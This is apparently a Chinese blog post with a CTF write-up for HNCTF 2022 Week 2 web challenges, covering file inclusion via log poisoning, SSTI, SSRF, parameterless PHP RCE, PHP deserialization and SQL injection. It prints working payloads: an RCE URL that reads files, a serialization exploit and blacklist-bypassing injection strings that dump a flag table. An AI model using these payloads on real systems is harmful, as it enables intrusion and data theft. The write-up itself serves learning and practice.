<!DOCTYPE html><html lang="ch" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>HNCTF-2022-WEEk2 | Hexo</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><script>var config = {"root":"/","search":{"preload":true,"activeHolder":"Enter here","blurHolder":"Search","noResult":"Data \"$0\" not found"},"code":{"codeInfo":"$0 - $1 lines","copy":"copy","copyFinish":"copied","expand":"expand"}}</script><script src="//unpkg.com/mermaid@9.2.2/dist/mermaid.min.js"></script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/brands.min.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/fontawesome.min.css"><link rel="stylesheet" href="/css/arknights.css"><script>if (window.localStorage.getItem('theme-mode') === 'light') document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark') document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.ttf");
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
@font-face {
 font-family: 'Font Awesome 6 Brands';
 src: local('Font Awesome 6 Brands'), url('/lib/fontawesome/fa-brands.woff2') format('woff2');
}
@font-face {
 font-family: 'Font Awesome 6 Free';
 src: local('Font Awesome 6 Free'), url('/lib/fontawesome/fa-regular.woff2') format('woff2');
}</style><style>:root {
  --dark-background: url('https://ak.hypergryph.com/assets/index/images/ak/pc/bk.jpg');
  --light-background: url('/img/bk.jpg');
}</style><meta name="generator" content="Hexo 6.3.0"></head><body><div class="loading" style="opacity: 0"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><nav><div class="navBtn hide"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="Search" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>HNCTF-2022-WEEk2</h1><div id="post-info"><span>First Post: <div class="control"><time datetime="2023-05-18T06:03:35.000Z" id="date"> 2023-05-18</time></div></span><br><span>Last Update: <div class="control"><time datetime="2023-05-21T14:17:39.758Z" id="updated"> 2023-05-21</time></div></span></div></div><hr><div id="post-content"><h1 id="HNCTF-2022-WEEK2-easy-include"><a href="#HNCTF-2022-WEEK2-easy-include" class="headerlink" title="[HNCTF 2022 WEEK2]easy_include"></a>[HNCTF 2022 WEEK2]easy_include</h1><h2 id="文件包含的基础"><a href="#文件包含的基础" class="headerlink" title="文件包含的基础"></a>文件包含的基础</h2><p>梳理一下</p>
<p class='item-img' data-src='/2023/05/18/HNCTF-2022-WEEk2/image-20230518201644911.png'><img src="/2023/05/18/HNCTF-2022-WEEk2/image-20230518201644911.png" alt="image-20230518201644911"></p>
<p>这里抄一张图：来自<a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_45300786/article/details/108724251">https://blog.csdn.net/qq_45300786/article/details/108724251</a></p>
<p>为什么要有文件包含，其实这个是一个非常妙也是很正常的一个思想，为了代码不要去有那么多的冗余</p>
<p>就用文件包含函数去包含，文件包含不在意后缀，只要是php代码，什么后缀都可以执行</p>
<h2 id="本地文件包含和远程文件包含"><a href="#本地文件包含和远程文件包含" class="headerlink" title="本地文件包含和远程文件包含"></a>本地文件包含和远程文件包含</h2><p class='item-img' data-src='/2023/05/18/HNCTF-2022-WEEk2/image-20230518203000537.png'><img src="/2023/05/18/HNCTF-2022-WEEk2/image-20230518203000537.png" alt="image-20230518203000537"></p>
<p>这道题就是利用了本地文件包含</p>
<p>nginx如果access.log可以访问，也就是过滤不全，被我们提权了，就可以在ua里面进行命令执行，因为返回的就是ua，所以就是在ua里面</p>
<p class='item-img' data-src='/2023/05/18/HNCTF-2022-WEEk2/image-20230518210629814.png'><img src="/2023/05/18/HNCTF-2022-WEEk2/image-20230518210629814.png" alt="image-20230518210629814"></p>
<p>这里好像可以用一句话木马，但是我没有成功，是不明白为什么</p>
<h1 id="HNCTF-2022-WEEK2-ez-SSTI"><a href="#HNCTF-2022-WEEK2-ez-SSTI" class="headerlink" title="[HNCTF 2022 WEEK2]ez_SSTI"></a>[HNCTF 2022 WEEK2]ez_SSTI</h1><p>fenjing</p>
<p class='item-img' data-src='/2023/05/18/HNCTF-2022-WEEk2/image-20230518213314476.png'><img src="/2023/05/18/HNCTF-2022-WEEk2/image-20230518213314476.png" alt="image-20230518213314476"></p>
<h1 id="HNCTF-2022-WEEK2-ez-ssrf"><a href="#HNCTF-2022-WEEK2-ez-ssrf" class="headerlink" title="[HNCTF 2022 WEEK2]ez_ssrf"></a>[HNCTF 2022 WEEK2]ez_ssrf</h1><p>人家写的很好</p>
<p><a target="_blank" rel="noopener" href="https://boogipop.com/2022/10/07/HNCTF%5Bez_ssrf%5D/![image-20230518215959113](HNCTF-2022-WEEk2/image-20230518215959113.png)">https://boogipop.com/2022/10/07/HNCTF%5Bez_ssrf%5D/![image-20230518215959113](HNCTF-2022-WEEk2/image-20230518215959113.png)</a></p>
<h1 id="HNCTF-2022-WEEK2-Canyource"><a href="#HNCTF-2022-WEEK2-Canyource" class="headerlink" title="[HNCTF 2022 WEEK2]Canyource"></a>[HNCTF 2022 WEEK2]Canyource</h1><p>无参数rce，之前也总结过</p>
<p>其实核心思想就是利用无参数的函数不择手段的去完成rce，</p>
<p class='item-img' data-src='/2023/05/18/HNCTF-2022-WEEk2/image-20230518223023471.png'><img src="/2023/05/18/HNCTF-2022-WEEk2/image-20230518223023471.png" alt="image-20230518223023471"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">payload：http://node2.anna.nssctf.cn:28302/?code=readfile(next(array_reverse(scandir(current(localeconv())))));<br></code></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/157431794">https://zhuanlan.zhihu.com/p/157431794</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/upstream-yu/p/15062311.html">https://www.cnblogs.com/upstream-yu/p/15062311.html</a></p>
<h1 id="HNCTF-2022-WEEK2-easy-unser"><a href="#HNCTF-2022-WEEK2-easy-unser" class="headerlink" title="[HNCTF 2022 WEEK2]easy_unser"></a>[HNCTF 2022 WEEK2]easy_unser</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><code class="hljs php"> <span class="hljs-meta">&lt;?php</span> <br>    <span class="hljs-keyword">include</span> <span class="hljs-string">&#x27;f14g.php&#x27;</span>;<br>    <span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br><br>    <span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><br>    <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">body</span></span>&#123;<br><br>    <span class="hljs-keyword">private</span> <span class="hljs-variable">$want</span>,<span class="hljs-variable">$todonothing</span> = <span class="hljs-string">&quot;i can&#x27;t get you want,But you can tell me before I wake up and change my mind&quot;</span>;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span>  <span class="hljs-title">__construct</span>(<span class="hljs-params"><span class="hljs-variable">$want</span></span>)</span>&#123;<br>        <span class="hljs-variable">$About_me</span> = <span class="hljs-string">&quot;When the object is created,I will be called&quot;</span>;<br>        <span class="hljs-keyword">if</span>(<span class="hljs-variable">$want</span> !== <span class="hljs-string">&quot; &quot;</span>) <span class="hljs-variable language_">$this</span>-&gt;want = <span class="hljs-variable">$want</span>;<br>        <span class="hljs-keyword">else</span> <span class="hljs-variable language_">$this</span>-&gt;want = <span class="hljs-variable language_">$this</span>-&gt;todonothing;<br>    &#125;<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-variable">$About_me</span> = <span class="hljs-string">&quot;When the object is unserialized,I will be called&quot;</span>;<br>        <span class="hljs-variable">$but</span> = <span class="hljs-string">&quot;I can CHANGE you&quot;</span>;<br>        <span class="hljs-variable language_">$this</span>-&gt; want = <span class="hljs-variable">$but</span>;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;C1ybaby!&quot;</span>;<br>        <br>    &#125;<br>    <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span>(<span class="hljs-params"></span>)</span>&#123;<br>        <span class="hljs-variable">$About_me</span> = <span class="hljs-string">&quot;I&#x27;m the final function,when the object is destroyed,I will be called&quot;</span>;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;So,let me see if you can get what you want\n&quot;</span>;<br>        <span class="hljs-keyword">if</span>(<span class="hljs-variable language_">$this</span>-&gt;todonothing === <span class="hljs-variable language_">$this</span>-&gt;want)<br>            <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;鲍勃,别傻愣着!\n&quot;</span>);<br>        <span class="hljs-keyword">if</span>(<span class="hljs-variable language_">$this</span>-&gt;want == <span class="hljs-string">&quot;I can CHANGE you&quot;</span>)<br>            <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;You are not you....&quot;</span>);<br>        <span class="hljs-keyword">if</span>(<span class="hljs-variable language_">$this</span>-&gt;want == <span class="hljs-string">&quot;f14g.php&quot;</span> OR <span class="hljs-title function_ invoke__">is_file</span>(<span class="hljs-variable">$this</span>-&gt;want))&#123;<br>            <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;You want my heart?No way!\n&quot;</span>);<br>        &#125;<span class="hljs-keyword">else</span>&#123;<br>            <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;You got it!&quot;</span>;<br>            <span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-variable">$this</span>-&gt;want);<br>            &#125;<br>    &#125;<br>&#125;<br><br>    <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">unserializeorder</span></span>&#123;<br>        <span class="hljs-keyword">public</span> <span class="hljs-variable">$CORE</span> = <span class="hljs-string">&quot;人类最大的敌人,就是无序. Yahi param vaastavikta hai!&lt;BR&gt;&quot;</span>;<br>        <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__sleep</span>(<span class="hljs-params"></span>)</span>&#123;<br>            <span class="hljs-variable">$About_me</span> = <span class="hljs-string">&quot;When the object is serialized,I will be called&quot;</span>;<br>            <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;We Come To HNCTF,Enjoy the ser14l1zti0n &lt;BR&gt;&quot;</span>;<br>        &#125;<br>        <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__toString</span>(<span class="hljs-params"></span>)</span>&#123;<br>            <span class="hljs-variable">$About_me</span> = <span class="hljs-string">&quot;When the object is used as a string,I will be called&quot;</span>;<br>            <span class="hljs-keyword">return</span> <span class="hljs-variable language_">$this</span>-&gt;CORE;<br>        &#125;<br>    &#125;<br>    <br>    <span class="hljs-variable">$obj</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">unserializeorder</span>();<br>    <span class="hljs-keyword">echo</span> <span class="hljs-variable">$obj</span>;<br>    <span class="hljs-variable">$obj</span> = <span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$obj</span>);<br>    <br><br>    <span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;ywant&#x27;</span>]))<br>    &#123;<br>        <span class="hljs-variable">$ywant</span> = @<span class="hljs-title function_ invoke__">unserialize</span>(@<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;ywant&#x27;</span>]);<br>        <span class="hljs-keyword">echo</span> <span class="hljs-variable">$ywant</span>;<br>    &#125;<br><span class="hljs-meta">?&gt;</span><br>人类最大的敌人,就是无序. Yahi param vaastavikta hai!<br>We Come To HNCTF,Enjoy the ser14l1zti0n<br><br></code></pre></td></tr></table></figure>

<p>反序列化</p>
<p>进行分析审计</p>
<p class='item-img' data-src='/2023/05/18/HNCTF-2022-WEEk2/image-20230521112751987.png'><img src="/2023/05/18/HNCTF-2022-WEEk2/image-20230521112751987.png" alt="image-20230521112751987"></p>
<p>里面其实也就是用到了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">&lt;?php<br>//Ten<br>class body&#123;<br>private $todonothing = &quot;test&quot;;<br>private $want=&#x27;./test/../f14g.php&#x27;;<br>&#125;<br>$obj = new body();<br>echo (urlencode(serialize($obj)));<br></code></pre></td></tr></table></figure>

<p>粘贴一个别人的exp</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">function __destruct()&#123;<br>       $About_me = &quot;I&#x27;m the final function,when the object is destroyed,I will be called&quot;;<br>       echo &quot;So,let me see if you can get what you want\n&quot;;<br>       if($this-&gt;todonothing === $this-&gt;want)<br>           die(&quot;鲍勃,别傻愣着!\n&quot;);<br>       if($this-&gt;want == &quot;I can CHANGE you&quot;)<br>           die(&quot;You are not you....&quot;);<br>       if($this-&gt;want == &quot;f14g.php&quot; OR is_file($this-&gt;want))&#123;<br>           die(&quot;You want my heart?No way!\n&quot;);<br>       &#125;else&#123;<br>           echo &quot;You got it!&quot;;<br>           highlight_file($this-&gt;want);<br>           &#125;<br>   &#125;<br></code></pre></td></tr></table></figure>

<h1 id="HNCTF-2022-WEEK2-easy-sql"><a href="#HNCTF-2022-WEEK2-easy-sql" class="headerlink" title="[HNCTF 2022 WEEK2]easy_sql"></a>[HNCTF 2022 WEEK2]easy_sql</h1><p class='item-img' data-src='/2023/05/18/HNCTF-2022-WEEk2/image-20230521202317360.png'><img src="/2023/05/18/HNCTF-2022-WEEk2/image-20230521202317360.png" alt="image-20230521202317360"></p>
<p>sql注入的题，测试</p>
<p>自测blacklist：空格，and，information_schema.tables ，table_schema </p>
<p>information_schema.tables 可以用 mysql.innodb_table_stats 代替<br>table_schema 可以用 database_name 代替</p>
<p>payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">数据库名<br>1&#x27;/**/union/**/select/**/1,2,database()/**/where/**/&#x27;1//这个好像是错的<br>查表名<br>0&#x27;/**/union/**/select/**/1,2,group_concat(database_name)/**/from/**/mysql.innodb_table_stats/**/where/**/&#x27;1<br>查列名<br>0&#x27;/**/union/**/select/**/1,2,group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/&#x27;1<br>这里用的是innodb引擎，就不要加限制条件，给啥都看<br>查字符串<br>0&#x27;union/**/select/**/1,2,group_concat(`1`)/**/from/**/(select/**/1/**/union/**/select/**/*/**/from/**/ctftraining.flag)a/**/where/**/&#x27;1<br></code></pre></td></tr></table></figure>



<p><a target="_blank" rel="noopener" href="https://wpscan.com/vulnerability/8acc0fc6-efe6-4662-b9ac-6342a7823328">https://wpscan.com/vulnerability/8acc0fc6-efe6-4662-b9ac-6342a7823328</a></p>
<h1 id="HNCTF-2022-WEEK2-ohmywordpress"><a href="#HNCTF-2022-WEEK2-ohmywordpress" class="headerlink" title="[HNCTF 2022 WEEK2]ohmywordpress"></a>[HNCTF 2022 WEEK2]ohmywordpress</h1><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/bossDDYY/article/details/127581507">https://blog.csdn.net/bossDDYY/article/details/127581507</a></p>
<p>一个cve</p>
<div id="paginator"></div></div><div id="post-footer"><div id="pages"><div class="footer-link" style="width: 50%;text-align:right;border-right:1px #fe2 solid"><a href="/2023/05/21/%E5%BC%BA%E7%BD%91%E6%9D%AF-nss/">← Next 强网杯--nss</a></div><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2023/05/18/ctfshow-ssrf/">ctfshow_ssrf Prev →</a></div></div></div></div><div class="bottom-btn"><div><a id="to-top" onClick="scrolls.scrolltop();" title="To Top" style="opacity: 0; display: none;">∧</a><a id="to-index" href="#toc-div" title="To Catalog">≡</a><a id="color-mode" onClick="colorMode.change()" title="Change Theme"></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://ak.hypergryph.com/assets/index/images/ak/pc/faction/1.png" alt="Logo"></a><h1 id="Dr"><a href="/">Dr0se</a></h1><div id="description"><p></p></div></div><div id="aside-block"><div id="toc-div"><h1>Catalog</h1><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#HNCTF-2022-WEEK2-easy-include"><span class="toc-number">1.</span> <span class="toc-text">[HNCTF 2022 WEEK2]easy_include</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E7%9A%84%E5%9F%BA%E7%A1%80"><span class="toc-number">1.1.</span> <span class="toc-text">文件包含的基础</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E5%92%8C%E8%BF%9C%E7%A8%8B%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB"><span class="toc-number">1.2.</span> <span class="toc-text">本地文件包含和远程文件包含</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#HNCTF-2022-WEEK2-ez-SSTI"><span class="toc-number">2.</span> <span class="toc-text">[HNCTF 2022 WEEK2]ez_SSTI</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#HNCTF-2022-WEEK2-ez-ssrf"><span class="toc-number">3.</span> <span class="toc-text">[HNCTF 2022 WEEK2]ez_ssrf</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#HNCTF-2022-WEEK2-Canyource"><span class="toc-number">4.</span> <span class="toc-text">[HNCTF 2022 WEEK2]Canyource</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#HNCTF-2022-WEEK2-easy-unser"><span class="toc-number">5.</span> <span class="toc-text">[HNCTF 2022 WEEK2]easy_unser</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#HNCTF-2022-WEEK2-easy-sql"><span class="toc-number">6.</span> <span class="toc-text">[HNCTF 2022 WEEK2]easy_sql</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#HNCTF-2022-WEEK2-ohmywordpress"><span class="toc-number">7.</span> <span class="toc-text">[HNCTF 2022 WEEK2]ohmywordpress</span></a></li></ol></div></div><footer><nobr>Published with <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> Theme <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr>by <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas><script src="/js/search.js"></script><script src="/js/arknights.js"></script><script src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script src="/js/pjax.js"></script><script class="pjax-js">reset= () => {code.findCode();
document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script></body></html>